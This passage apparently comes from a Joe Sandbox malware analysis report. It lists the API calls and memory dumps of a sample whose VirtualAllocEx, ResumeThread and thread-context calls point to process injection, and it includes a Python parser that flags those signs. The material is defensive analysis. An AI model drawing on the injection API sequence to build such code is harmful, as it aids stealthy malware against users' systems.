• Snapshot File: hcaresult_9_2_4500000_pUAQmWA.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: 2ea4c5ca54e43761f3048ae5f83d801554d84eb5ceb8d9ffc9c549ad115bf426
• Instruction ID: aabb278e874911ead56359a475e2f27067e061342ce8ab746736a3b497ba91e3
• Opcode Fuzzy Hash: 2ea4c5ca54e43761f3048ae5f83d801554d84eb5ceb8d9ffc9c549ad115bf426
• Instruction Fuzzy Hash: 0D2128B19002099FDB10DFAAC4857EEBBF4FF88324F14C42AD459A7281D778A945CFA5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: basic blocks 231e5d8-231eb62, call to DuplicateHandle (graph rendering not captured)
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0231EA6E,?,?,?,?,?), ref: 0231EB2F
Memory Dump Source
• Source File: 00000009.00000002.1713905223.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_2310000_pUAQmWA.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: e5a0c03191040b61c8103cfe123d497b8c293ae81e62c305d445acf583ef43a4
• Instruction ID: a3d4506c58fcc715fc51812dc015650b480b0b6bfa8d5403df6e9be8546be2f5
• Opcode Fuzzy Hash: e5a0c03191040b61c8103cfe123d497b8c293ae81e62c305d445acf583ef43a4
• Instruction Fuzzy Hash: BF2103B5900208AFDB10CFAAD584ADEFBF8FB48320F14801AE954B7310D375A940CFA0
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: basic blocks 4500fd0-450109e, call to ReadProcessMemory (graph rendering not captured)
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04501058
Memory Dump Source
• Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4500000_pUAQmWA.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: 9e7451902bcba4a41c37f7fd91dfbcbcb0bb490827eeb315732a817c3a5cf6f3
• Instruction ID: 39da1bcc766a74a5e069bdc775a0d33006cb614444b81c0cfa6f4f37d28effed
• Opcode Fuzzy Hash: 9e7451902bcba4a41c37f7fd91dfbcbcb0bb490827eeb315732a817c3a5cf6f3
• Instruction Fuzzy Hash: 182136B1900259DFCB10DFAAC980AEEFBF5FF48320F108429E958A7250C775A944DBA5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: basic blocks 4500d50-4500e14, call to Wow64SetThreadContext (graph rendering not captured)
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04500DCE
Memory Dump Source
• Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4500000_pUAQmWA.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: 93b0696bbc37be4d01bc07300598713c6821e9dc95442858fc859a10d54b1351
• Instruction ID: 603a5177b8f5b96b80b04d64bdf11e346880272747939bad8855a12641f686ef
• Opcode Fuzzy Hash: 93b0696bbc37be4d01bc07300598713c6821e9dc95442858fc859a10d54b1351
• Instruction Fuzzy Hash: A92118B59002099FDB10DFAAC4857EEBBF4FF88324F14C42AD459A7281C778A945CFA5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: basic blocks 4500fd8-450109e, call to ReadProcessMemory (graph rendering not captured)
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04501058
Memory Dump Source
• Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4500000_pUAQmWA.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: 596eedaf3cd3e26fdb1cc838e8248f02b14335b3d5785b9ed2441c8422f2cbfa
• Instruction ID: 7ed84444af524e973d1ca82501a7be2d2340d908c5f232d5497ee20643861d57
• Opcode Fuzzy Hash: 596eedaf3cd3e26fdb1cc838e8248f02b14335b3d5785b9ed2441c8422f2cbfa
• Instruction Fuzzy Hash: 2C2128B19003599FCB10DFAAC841ADEFBF5FF48320F108429E558A7250C775A544DBA5
Uniqueness
Uniqueness Score: -1.00%

APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04500E96
Memory Dump Source
• Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4500000_pUAQmWA.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 8c87cd66b09ab8b61569207754751613045f34f498d6d44130c66d44ab4f0c2c
• Instruction ID: 57c079c6adc733fe44327b5587ddb4ec417cee41b1a425ad1f10b067dc88766a
• Opcode Fuzzy Hash: 8c87cd66b09ab8b61569207754751613045f34f498d6d44130c66d44ab4f0c2c
• Instruction Fuzzy Hash: 4D1144B28002488FCB10DFAAD845BDFBFF5EB88320F208419E559A7250C735A544DBA5
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0231C8A1,00000800,00000000,00000000), ref: 0231CAB2
Memory Dump Source
• Source File: 00000009.00000002.1713905223.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_2310000_pUAQmWA.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 08af778c14c5112bccc26e78e9dd38e2ff85194752480000c37fc084a4c0a0ae
• Instruction ID: 5822ebc75d2b3cdff531b77148b7dd6c4c3f3f9c9010602c038841936008bb53
• Opcode Fuzzy Hash: 08af778c14c5112bccc26e78e9dd38e2ff85194752480000c37fc084a4c0a0ae
• Instruction Fuzzy Hash: A01112B6D003499FDB14CF9AC544ADEFBF8EB88324F14842AE419A7250C375A945CFA5
Uniqueness
Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_4500000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID: ResumeThread
                                                                                  • String ID:
                                                                                  • API String ID: 947044025-0
                                                                                  • Opcode ID: a78282d056ef30cd3025713454bf8efa0c9284e465d89497db9dd702f1b791d7
                                                                                  • Instruction ID: 17fe526a1a415c25f246e2553ef7571b99ddb4f9eaf3ed6074d37f98a3062409
                                                                                  • Opcode Fuzzy Hash: a78282d056ef30cd3025713454bf8efa0c9284e465d89497db9dd702f1b791d7
                                                                                  • Instruction Fuzzy Hash: CE1158B1D002499FCB10DFAAD4457DFFBF4EF88324F248419D459A7240CB74A945CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04500E96
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_4500000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: fd8f588851a4dd32c6aece3ba8cef5a5812a37068786e39ff6037483493f63a0
                                                                                  • Instruction ID: 89874b2ef5068d0a82d6d392c67d5751937d4db159bbd9fffe5a0e7cca3fc25b
                                                                                  • Opcode Fuzzy Hash: fd8f588851a4dd32c6aece3ba8cef5a5812a37068786e39ff6037483493f63a0
                                                                                  • Instruction Fuzzy Hash: 5E1156728002488FCB10DFAAC844BDFBFF5EF88320F208419E559A7250C735A544CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_4500000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID: ResumeThread
                                                                                  • String ID:
                                                                                  • API String ID: 947044025-0
                                                                                  • Opcode ID: 73282ff24f39356a07c9d78891aace20010197858bbda405de77acd10141dbd8
                                                                                  • Instruction ID: 1ea1fadd7095c2b4968bd9e53739ca1161749fcbc152000b0d751894e4f1f99f
                                                                                  • Opcode Fuzzy Hash: 73282ff24f39356a07c9d78891aace20010197858bbda405de77acd10141dbd8
                                                                                  • Instruction Fuzzy Hash: 3A1155B19002488BCB20DFAAD4457DFFBF4AF88324F208429C459A7240CB34A944CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 04504BDD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_4500000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost
                                                                                  • String ID:
                                                                                  • API String ID: 410705778-0
                                                                                  • Opcode ID: ecd87ffbb2a8c5fbb2518f5602d1735bcb183b0eb15867954ca3714f68cedebb
                                                                                  • Instruction ID: bec2084c6b6920a039d69e366e56dad54e4b9e9c42c3ac18f2b48a9532b6d9b9
                                                                                  • Opcode Fuzzy Hash: ecd87ffbb2a8c5fbb2518f5602d1735bcb183b0eb15867954ca3714f68cedebb
                                                                                  • Instruction Fuzzy Hash: 711106B58006499FDB10DF9AD889BDEFBF4FB48324F10845AD958A7250C375A984CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0231C826
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1713905223.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_2310000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: cbc96fa442f18d0ffa5b3190dc3f6825171a455563826a4ac16d32e67921b4d3
                                                                                  • Instruction ID: 7134bafcacc499c618d7094b9732de934386a63f7800431a9b6752661469f605
                                                                                  • Opcode Fuzzy Hash: cbc96fa442f18d0ffa5b3190dc3f6825171a455563826a4ac16d32e67921b4d3
                                                                                  • Instruction Fuzzy Hash: D211DFB6D002498FCB14DF9AD544ADEFBF4EB88324F10846AD459B7210C375A545CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 04504BDD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_4500000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost
                                                                                  • String ID:
                                                                                  • API String ID: 410705778-0
                                                                                  • Opcode ID: 778e7acd6470465aa70783e59caed8aff47f4d33ec9fb807ec420ddc9b4fc448
                                                                                  • Instruction ID: 8365b1931b35560fea962c523d34fce66883a929ebfb6ed1ec5ac54a15620548
                                                                                  • Opcode Fuzzy Hash: 778e7acd6470465aa70783e59caed8aff47f4d33ec9fb807ec420ddc9b4fc448
                                                                                  • Instruction Fuzzy Hash: C61122B58003489FDB10DF9AD845BDEBBF8FB48320F108459E958A7240C374A944CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Te^q
                                                                                  • API String ID: 0-671973202
                                                                                  • Opcode ID: 60a5851a7bf04bcb4f38f75450e01bba9e999fa169d9c4022f991826247549ad
                                                                                  • Instruction ID: a4aafa68c1f33a5c569c9f485e471d361249b657b5278eb3d61fa537575b6616
                                                                                  • Opcode Fuzzy Hash: 60a5851a7bf04bcb4f38f75450e01bba9e999fa169d9c4022f991826247549ad
                                                                                  • Instruction Fuzzy Hash: DA51A131B006068FCB14DB79D8889BEBBF6EFC8214B14892AE469D7351DF34DD058791
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: l.^q
                                                                                  • API String ID: 0-1633537341
                                                                                  • Opcode ID: 2b803c52c2692670f37c2394e8310e856bd9b5cb5db8ddd1040dcbba6a8d6dff
                                                                                  • Instruction ID: b24d588d57bcb1439202521423bcb633d3fd9d958fe59bfefc7a52561b95ecba
                                                                                  • Opcode Fuzzy Hash: 2b803c52c2692670f37c2394e8310e856bd9b5cb5db8ddd1040dcbba6a8d6dff
                                                                                  • Instruction Fuzzy Hash: BD21D6B6E0412DCFCB608F58A8095BEB7A5BB85611F1C4626EB95D7A40D231CB14C7D0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Te^q
                                                                                  • API String ID: 0-671973202
                                                                                  • Opcode ID: 1c950aa083693d0bbbeff405a3ead46a14e94e8dbaf011de543cc7db16685a68
                                                                                  • Instruction ID: 68c2da5fdd2e47964eba2e0aa1c63b3d44029abf3d68c1961310cba682f88aeb
                                                                                  • Opcode Fuzzy Hash: 1c950aa083693d0bbbeff405a3ead46a14e94e8dbaf011de543cc7db16685a68
                                                                                  • Instruction Fuzzy Hash: 5331F6B0E0124C9FDB48DFAAD9456AEFBF6AF88305F10902AD819AB354DB345905CF80
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Te^q
                                                                                  • API String ID: 0-671973202
                                                                                  • Opcode ID: a9ba4973323545e60607c3baaeeb855c1f4d97431f120781ebcbdbd4f486ce23
                                                                                  • Instruction ID: 8ce431d61eba1efb1e0e1f8ccf602031264a52dcbdb06783544c405446c2fcd1
                                                                                  • Opcode Fuzzy Hash: a9ba4973323545e60607c3baaeeb855c1f4d97431f120781ebcbdbd4f486ce23
                                                                                  • Instruction Fuzzy Hash: 09115E31F4020A8FCB54EBB999405EEB6FAAB88214B10002AC509EB344EB31CE06CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: fcq
                                                                                  • API String ID: 0-2768158334
                                                                                  • Opcode ID: f4e97207574480b3f97312869960a355d702ecc43cacbe7ae7f5fe38244c21f1
                                                                                  • Instruction ID: 3ad5be5081b04ec381eedec0dc03deeb0725f0f8c35f4cb50a638759e54fe7ac
                                                                                  • Opcode Fuzzy Hash: f4e97207574480b3f97312869960a355d702ecc43cacbe7ae7f5fe38244c21f1
                                                                                  • Instruction Fuzzy Hash: 41F08CB1A442188FDB009B91D819B6E7FA2BF51351F498092F449DF2D3DB68DD81C790
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

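Read across blocks rather than one at a time, these entries carry the report's injection story: the 04500000 region contains both VirtualAllocEx (API ID AllocVirtual) and ResumeThread, the allocate-then-start pair of remote process injection and consistent with the "Injects a PE file into a foreign processes" signature in the summary, plus PostMessageW whose second argument 00000010 is WM_CLOSE. Every dump is also "based on PE: false", i.e. not backed by a mapped image. The Python below is an added example, not Joe Sandbox code: it parses blocks in this text layout, groups them by dump offset and applies those checks. The sample input is constructed from this section's own blocks, trimmed to the lines the parser reads; treating the fifth dot-separated field of the .sdmp name as the region's page protection is an assumption about the dump naming scheme.

```python
"""Parse Joe Sandbox 'Executed Functions' blocks (layout as in this section) and
score each memory-dump region by the Win32 APIs seen in it. Added example."""
import re
from collections import defaultdict

# Constructed input: blocks copied from this section, trimmed to the lines used.
# The third block has an empty APIs list but a ResumeThread API ID, as above.
SAMPLE = """\
APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0231C8A1,00000800,00000000,00000000), ref: 0231CAB2
• Source File: 00000009.00000002.1713905223.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
• API ID: LibraryLoad
• String ID:
Uniqueness Score: -1.00%

APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04500E96
• Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
• API ID: AllocVirtual
• String ID:
Uniqueness Score: -1.00%

APIs
• Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
• API ID: ResumeThread
• String ID:
Uniqueness Score: -1.00%

APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 04504BDD
• Source File: 00000009.00000002.1722695915.0000000004500000.00000040.00000800.00020000.00000000.sdmp, Offset: 04500000, based on PE: false
• API ID: MessagePost
• String ID:
Uniqueness Score: -1.00%

Strings
• Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
• API ID:
• String ID: Te^q
Uniqueness Score: -1.00%
"""

CALL_RE = re.compile(r"•\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)")
SRC_RE = re.compile(r"Source File:\s*(\S+\.sdmp),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)")
APIID_RE = re.compile(r"•\s*API ID:\s*(.*)")
STRID_RE = re.compile(r"•\s*String ID:\s*(.*)")

PAGE_EXECUTE_READWRITE = 0x40  # Win32 page-protection constant
WM_CLOSE = 0x0010              # USER32 window message
# Joe Sandbox API IDs for the allocate / start-thread pair of remote injection;
# the two together in one region are flagged, never a single call on its own.
INJECTION_IDS = {"AllocVirtual", "ResumeThread"}


def parse_blocks(text):
    """Yield one dict per function block; blocks end at 'Uniqueness Score'."""
    for raw in re.split(r"Uniqueness Score:[^\n]*\n", text):
        if not raw.strip():
            continue
        block = {"calls": [], "api_ids": set(), "string_ids": set(),
                 "offset": None, "dump": None, "pe_backed": None}
        for line in raw.splitlines():
            if m := CALL_RE.search(line):
                block["calls"].append({"api": m.group(1), "module": m.group(2),
                                       "args": m.group(3).split(","), "ref": m.group(4)})
            elif m := SRC_RE.search(line):
                block["dump"], block["offset"] = m.group(1), m.group(2)
                block["pe_backed"] = m.group(3) == "true"
            elif (m := APIID_RE.search(line)) and m.group(1).strip():
                block["api_ids"].add(m.group(1).strip())   # set even when APIs list is empty
            elif (m := STRID_RE.search(line)) and m.group(1).strip():
                block["string_ids"].add(m.group(1).strip())
        if block["offset"]:
            yield block


def dump_protection(dump_name):
    """Assumption: the fifth dot-separated field of the .sdmp name is the page protection."""
    return int(dump_name.split(".")[4], 16)


def assess_regions(text):
    """Group blocks by dump offset and attach the checks an analyst would make."""
    regions = defaultdict(lambda: {"api_ids": set(), "strings": set(), "calls": [],
                                   "pe_backed": None, "protect": None})
    for b in parse_blocks(text):
        r = regions[b["offset"]]
        r["api_ids"] |= b["api_ids"]
        r["strings"] |= b["string_ids"]
        r["calls"].extend(b["calls"])
        r["pe_backed"], r["protect"] = b["pe_backed"], dump_protection(b["dump"])
    report = {}
    for off, r in regions.items():
        findings = []
        if INJECTION_IDS <= r["api_ids"]:
            findings.append("VirtualAllocEx and ResumeThread in one region: allocation plus "
                            "thread start, consistent with process injection")
        if r["protect"] == PAGE_EXECUTE_READWRITE and r["pe_backed"] is False:
            findings.append("RWX region not backed by a PE image: unpacked or injected code")
        for c in r["calls"]:
            if c["api"] == "PostMessageW" and int(c["args"][1], 16) == WM_CLOSE:
                findings.append(f"PostMessageW with WM_CLOSE at {c['ref']}: closes a window")
        report[off] = {"api_ids": sorted(r["api_ids"]), "findings": findings}
    return report


if __name__ == "__main__":
    for off, info in assess_regions(SAMPLE).items():
        print(off, info["api_ids"])
        for f in info["findings"]:
            print("   -", f)
```

The grouping key is the dump offset, not the function, because a Joe Sandbox block describes one function and the injection evidence only appears when the calls of several functions from the same unpacked region are read together; the Similarity "API ID" field is used as a fallback so that blocks with an empty APIs list (as for ResumeThread above) still contribute.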
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6846a20609b50ef65eb47ba85c48b7155dcb661bd5bb2eaf2e530bfdf962b857
                                                                                  • Instruction ID: fe779bda461e346f97856d6a1ad10a1a1f85d1d4114b4f437e3c4c4346d75361
                                                                                  • Opcode Fuzzy Hash: 6846a20609b50ef65eb47ba85c48b7155dcb661bd5bb2eaf2e530bfdf962b857
                                                                                  • Instruction Fuzzy Hash: 1EB12C70E1121DCFDB44DFA8D981AEDBBB6FF88304F109625E419AB355DB30A985CB80
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dd222ad61d1a5f84dd4c0a6319bd924b81185bfede066bcd252f484a5d0e78f4
                                                                                  • Instruction ID: f8564557bc8ad3cecf9125195d24c86ad2721ae60bcdb199e2171a1c3fdd7b32
                                                                                  • Opcode Fuzzy Hash: dd222ad61d1a5f84dd4c0a6319bd924b81185bfede066bcd252f484a5d0e78f4
                                                                                  • Instruction Fuzzy Hash: 5561C434F042489FE744DBA9D841B7EBAB2FB89704F10856AF561DB385DB34D842CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 007ea0f24f7c2bc0eefbfa3f88421f8e7bbc304d18bf69f1dde6b557fc310643
                                                                                  • Instruction ID: d2633683ac00d933e21d7988809502ade4d2eb5cfcca2ae9f0bb826f30fc552f
                                                                                  • Opcode Fuzzy Hash: 007ea0f24f7c2bc0eefbfa3f88421f8e7bbc304d18bf69f1dde6b557fc310643
                                                                                  • Instruction Fuzzy Hash: 8C51D474F042089FE744DBA9D841B7EBAB3FB88714F10816AE561EB385DB34D842CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 61ef9f7e38342d2bddc81cc7b00da8fd045315ffad0705df8f7028453a4fb7a9
                                                                                  • Instruction ID: 0f3d948c5e25606fe6f72ae287478f463855e7930fc6961198c5b4258fa21b6d
                                                                                  • Opcode Fuzzy Hash: 61ef9f7e38342d2bddc81cc7b00da8fd045315ffad0705df8f7028453a4fb7a9
                                                                                  • Instruction Fuzzy Hash: F251F371D182598FC780CB69C8486AEFBF1AF52304F5C806BD1E5EBA92D334D906CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a1de0f6fa0d3dc1b9dd6c13e596d470c54a1656ad75993a17bc2156d231dc91a
                                                                                  • Instruction ID: 8e3d2cd0301cd829499870ed1de3aed74fadc93cc6c9ce1a549ada5c5ccbf840
                                                                                  • Opcode Fuzzy Hash: a1de0f6fa0d3dc1b9dd6c13e596d470c54a1656ad75993a17bc2156d231dc91a
                                                                                  • Instruction Fuzzy Hash: 0251DE31E04519CFDB90CF68C8492BEB7B1FB45295F0C8226E6EAD7A90D334DA40CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f5433fb708783eb3a4e4f3ad15bbde203596046efd29f7fa75659f07f1a88fa9
                                                                                  • Instruction ID: ea11c8521af6c38e85624448b505a1bd705d61bd9d181d0e517d8c58728aaad9
                                                                                  • Opcode Fuzzy Hash: f5433fb708783eb3a4e4f3ad15bbde203596046efd29f7fa75659f07f1a88fa9
                                                                                  • Instruction Fuzzy Hash: 3D41A174909685DFC306CF6AE594958BFF1EF8A200B2A80D6D484DB6B3DB349E16C712
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6f978e6e10a368470f68532fcb99051faf303f30a5849e481f61a903c2548175
                                                                                  • Instruction ID: c8a29df29eb9a027128eeb4be3c49e0ecd5b6ae58a76ef0d3671aeed6743230f
                                                                                  • Opcode Fuzzy Hash: 6f978e6e10a368470f68532fcb99051faf303f30a5849e481f61a903c2548175
                                                                                  • Instruction Fuzzy Hash: 1C41B075E102198FDB44CFA9D885AEEBBF2EB89304F14846AD519F7304E7349A45CF90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
